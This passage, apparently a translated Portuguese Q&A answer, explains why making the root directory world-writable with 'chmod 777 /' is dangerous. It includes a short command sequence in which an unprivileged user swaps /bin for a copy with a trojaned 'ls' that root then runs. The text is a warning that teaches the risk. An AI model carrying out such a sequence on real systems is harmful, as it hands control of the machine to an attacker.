Um invasor (usuário não privilegiado) poderá criar novos diretórios e arquivos no diretório raiz e renomear qualquer diretório existente em / (por exemplo, para um valor aleatório que renderiza efetivamente a máquina inutilizável).
Combinado, permite que usuários sem privilégios substituam os diretórios existentes por seu próprio conteúdo. Pense em /bin . Primeiro:
sudo chmod 777 /
Agora, a parte do atacante (usuário sem privilégios):
cp -r /bin /newbin
echo "echo boo running my own code as 'whoami'" > /newbin/ls
chmod +x /newbin/ls
mv /bin /oldbin
/oldbin/mv /newbin /bin
Agora verifique isso:
sudo -i
ls
Ele está efetivamente dando a um invasor uma maneira simples de ser proprietário da máquina.